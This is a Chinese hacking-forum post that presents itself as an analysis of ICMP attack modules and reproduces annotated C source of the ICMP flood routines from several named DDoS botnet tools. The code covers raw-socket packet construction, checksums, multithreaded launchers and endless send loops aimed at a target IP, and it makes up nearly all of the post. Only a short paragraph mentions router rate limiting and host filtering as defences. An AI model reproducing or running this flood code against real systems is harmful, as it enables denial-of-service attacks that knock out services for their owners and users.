HanDs
管理员

[Visual Studio文章] 攻击模块分析-ICMP篇 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

ICMP洪水攻击从代码中我们可以看出都是 自定义ICMP首部 然后进行快速的发送


ICMP洪水攻击(实用于大带宽服务器)

操作系统规定的ICMP数据包最大尺寸不超过64KB这一规定
如果ICMP数据包的尺寸超过64KB上限时,主机就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使主机死机。(现在的操作系统已经限制了发送ICMP数据包的大小,解决了这个漏洞)
    此外,向目标主机长时间、连续、大量地发送ICMP数据包,也会最终使系统瘫痪。大量的ICMP数据包会形成“ICMP风暴”,使得目标主机耗费大量的CPU资源处理,疲于奔命。

防范方法
第一种方法是在路由器上对ICMP数据包进行带宽限制,将ICMP占用的带宽控制在一定的范围内,这样即使有ICMP攻击,它所占用的带宽也是非常有限的,对整个网络的影响非常少;
第二种方法就是在主机上设置ICMP数据包的处理规则,最好是设定拒绝所有的ICMP数据包。

设置ICMP数据包处理规则的方法也有两种,一种是在操作系统上设置包过滤,另一种是在主机上安装防火墙。具体设置如下:

//=================================================================================

冷风的.h

/*ICMP Header*/
typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   //填写相应icmp头结构 然后发送
icmp_hdr->i_type = ICMP_ECHO; //告之所发送的是探测主机类型的icmp 即ping
icmp_hdr->i_code = 0; //发送默认
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId(); //自己的id //GetCurrentProcessID 得到当前进程的ID
icmp_hdr->i_cksum = 0;   //发送包 //代码
icmp_hdr->i_seq = 0;//序列

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制内存
}

unsigned long CALLBACK icmp_flood(LPVOID dParam)   //ICMP攻击
{  
SOCKET m_hSocket; //套接字
SOCKADDR_IN m_addrDest; //IP信息结构
char              *icmp_data;
int   datasize = 32;
int timeout = 2000;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
   return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
   return 0;

memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
m_addrDest.sin_addr.S_un.S_addr=resolve(DdosUrl); //网络地址 被攻击者的IP

datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET);   //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送

int seq_no=0;
while(!StopDDosAttack) //是否在攻击状态
{
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
   sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     //向一指定目的地发送数据
   if (seq_no>=65534) //攻击次数
    seq_no=1;
   Sleep(100); //暂停(毫秒)
}
return 0;
}

//=================================================================================

Maxer.h

/*ICMP Header*/
typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

//ICMP攻击
DWORD WINAPI IcmpFlood(LPVOID dParam)
{  
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存

WSADATA wsaData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData);//确定SOCKET版本

SOCKET m_hSocket;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
   return 0;

int timeout = 3000;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时      //SOCKET_ERROR创建错误
   return 0;

SOCKADDR_IN m_sockaddr;//IP信息结构
m_sockaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(ddosinfo.addr);//IP地址

ICMP_HEADER icmp_header;//icmp头结构
icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount(); //时间戳    GetTickCount()从操作系统启动到现在所经过(elapsed)的毫秒数,它的返回值是DWORD。

char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
   if(IsStop==1)//是否在攻击状态
   {
    ExitThread(0);
    return 0;
   }
   for(int a=0;a<10;a++) //攻击次数 才攻击10次是不是太少了
    sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr));    //向一指定目的地发送数据
}
return 0;
}

//=================================================================================

NetBot_Attacker.h

//大家看这个是不是跟 冷风的.h 代码一样呢呵呵 我认为是冷风抄袭NB的呵呵应为NB这个写的早冷风给我的时候比较晚
//冷风给我的时候 NB的这个代码还没发布呢    说明NB早就给冷风了
//在这里就不注释了
/*ICMP Header*/
typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}

unsigned long CALLBACK icmp_flood(LPVOID dParam)
{  
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);   //判断SOCKET版本     冷风的.h    没做
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;
int timeout = 2000;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
   return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
   return 0;

memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);

datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);

int seq_no=0;
while(!stopfuck)
{
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
   sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
   if (seq_no>=65534)
    seq_no=1;
   Sleep(40);
}
return 0;
}

//=================================================================================

暴风DDOS.h

#define ICMP_ECHO               8
#define MAX_PACKET       4096

typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}

void icmp_flood()
{  
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); //COCKET版本
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest; //IP信息结构
char              *icmp_data;
int   datasize = 32;
int timeout = 2000;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET)   //INVALID_SOCKET发生错误
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{   //inet_addr将ip地址转换成网络地址   INADDR_NONE非法地址
   struct hostent *hp = NULL; //hostent IP信息结构体
   if ((hp = gethostbyname(tgtIP)) != NULL) //gethostbyname主机信息
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length); //复制内存
   m_addrDest.sin_family = hp->h_addrtype;
   }
   else
    return;
}            

datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送
int seq_no=0;
int sleep_time = SleepTime/10; //这个值好像没有用到啊
while(1)
{
   if (StopFlag == 1)//是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;//发送包 //代码
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
   for (int i=0;i<100;i++) //循环攻击100次
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     //向一指定目的地发送数据
   Sleep(5); //暂停(毫秒)
}
return;
}


void StartICMP(char ip[30],int port,int time,int xc)
{

   if (inet_addr(ip)== INADDR_NONE)
   {
    struct hostent *hp = NULL;
    if ((hp = gethostbyname(ip)) != NULL)
    {
     in_addr in;
     memcpy(&in, hp->h_addr, hp->h_length);
     strcpy(tgtIP,inet_ntoa(in));
    }
   }
   else
    strcpy(tgtIP,ip);


   port=tgtPort;
   time=timeout;

   if (StopFlag == -1)
    return;

   StopFlag=-1;

   for(i=0;i<xc;i++)
   {
    h=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
   }
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}

//==================== ================================

暴风DDOSVIP2010-225源代码.h

/*-----------------------------ICMP data-----------------------------------------------*/
typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

void icmpattack()
{  
WSADATA wsaData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本

SOCKET m_hSocket;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
   return;

if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
   return;

SOCKADDR_IN m_sockaddr; //IP信息结构
m_sockaddr.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(tgtIP); //攻击IP

ICMP_HEADER icmp_header;//icmp头结构
icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount();//时间戳

char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化 初始化攻击数据
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
   if(StopFlag==1)//是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   for(int a=0;a<10;a++) //攻击次数
    sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); //向一指定目的地发送数据
}
WSACleanup();    //中止Windows Sockets DLL的使用
return;
}


void StartICMP(char ip[30],int port,int time,int xc)
{
   if (inet_addr(ip)== INADDR_NONE)
   {
    struct hostent *hp = NULL;
    if ((hp = gethostbyname(ip)) != NULL)
    {
     in_addr in;
     memcpy(&in, hp->h_addr, hp->h_length);
     strcpy(tgtIP,inet_ntoa(in));
    }
   }
   else
    strcpy(tgtIP,ip);


   tgtPort=port;
   timeout=time;

   if (StopFlag == -1)
    return;

   StopFlag=-1;

   for(z=0;z<xc;z++)
   {
    h[z]=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmpattack,NULL,0,NULL);
   }
   if(timeout!=0)
   {
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
   }
}

//================ ===================================

分布式DDOS.h

struct ICMPHeader   //24bytes
{
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned short ProcessID;
unsigned short Seq;
char data[16];
};

//initialize ICMP packet
void InitICMPPacket(ICMPHeader* p)
{
p->type=8; //告之所发送的是探测主机类型的icmp 即ping
p->code=0;//发送默认
p->ProcessID=(unsigned short)GetCurrentProcessId(); //自己的id    GetCurrentProcessId()进程ID
p->Seq=0;//序列
char buf[]="Attack you!";
strcpy(p->data,buf); //发送数据内容

unsigned long ulSum=0;
unsigned short *pBuf=(unsigned short *)p;
int size=sizeof(ICMPHeader);
int index=0;
for(;size > 1;size -= 2,index++)
   ulSum += pBuf[index];
if(size != 0) ulSum += pBuf[index];
ulSum = (ulSum>>16) + (ulSum&0xffff);
ulSum += (ulSum>>16);
p->checksum = (unsigned short)(~ulSum);
}

UINT CDDOSClientDlg::AttackThread(void* param)
{
CDDOSClientDlg *p = (CDDOSClientDlg *)param;

SOCKET att_sock = socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP); //创建socket UDP模式
SOCKADDR_IN att_addr; //IP信息结构
att_addr.sin_family = PF_INET; //sin_family 地址家族(必须是AF_INET)
att_addr.sin_addr.s_addr = inet_addr(p->att_head.ip); //inet_addr将ip地址转换成网络地址

ICMPHeader packet;
InitICMPPacket(&packet); //填充ICMP首部
while(p->isAttacking)
{
   sendto(att_sock,(char *)&packet,sizeof(ICMPHeader),0,(sockaddr *)&att_addr,sizeof(SOCKADDR_IN)); //向一指定目的地发送数据
   //Sleep(1000);
}

return 0;
}

//======================= ==========================

盘古1.5代码.h

//这里我们可以看到和 暴风DDOS.h   是一样的所以我们不介绍了
//暴风DDOS(前几个版本) 的攻击模块是使用盘古的

/////////////ICMP 攻击
/*ICMP Header*/
typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;


#define ICMP_ECHO               8
#define MAX_PACKET       4096

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
   cksum+=*buffer++;
   size -=sizeof(USHORT);
}
if(size)
{
   cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}


void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}

void icmp_flood() //ICMP攻击
{  
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;
int timeout = 2000;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
          //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
                              //inet_addr将ip地址转换成网络地址 IP地址不正确返回INADDR_NONE
{  
   struct hostent *hp = NULL; //hostent域名转换成IP
   if ((hp = gethostbyname(tgtIP)) != NULL)
        //gethostbyname主机信息 tgtIPIP地址   != NULL不等于空
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
                                            //hp->h_length表示的是主机ip地址的长度
   m_addrDest.sin_family = hp->h_addrtype;
                         //hp->h_addrtype主机ip地址的类型是ipv4(AF_INET)还是ipv6(AF_INET6)
   }
   else
    return;
}            

datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET); //填充ICMP首部
int seq_no=0;
int sleep_time = SleepTime/10; //并没有使用到
while(1)
{
   if (StopFlag == 1) //StopFlag= 1; 表示没有在攻击
   {
    ExitThread(0);
    return;
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
   for (int i=0;i<100;i++)
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
   Sleep(5);
}
return;
}
/////////////////ICMP攻击结束

//================== ===============================

盘古DDOS优化版.h

typedef struct _icmphdr     //定义ICMP首部
{
BYTE   i_type;      //8位类型
BYTE   i_code;      //8位代码
USHORT i_cksum;      //16位校验和
USHORT i_id;      //识别号(一般用进程号作为识别号)
USHORT i_seq;      //报文序列号
ULONG timestamp;     //时间戳
}ICMP_HEADER;

#define ICMP_ECHO               8
#define MAX_PACKET       4096

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
   cksum+=*buffer++;
   size -=sizeof(USHORT);
}
if(size )
{
   cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}


///ICMP
char icmpBuffer[256]="啊啊啊啊啊"; //攻击数据

void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制攻击数据
}

void icmpflood()
{  
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;
int timeout = 2000;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET)   //INVALID_SOCKET发生错误
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)     //设置套接口的选项 设置发送和接收的超时   //SOCKET_ERROR创建错误
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE) //网络地址 被攻击者的IP
{  
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(tgtip)) != NULL)
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
   m_addrDest.sin_family = hp->h_addrtype;
   }
   else
    return;
}            

datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
                  //HeapAlloc分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构
int seq_no=0;
while(1)
{
   if (Stop == 1)
   {
    ExitThread(0);
    return;
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
   for (int i=0;i<1000;i++)
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     //向一指定目的地发送数据
   Sleep(20);
}
return;
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
攻击
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复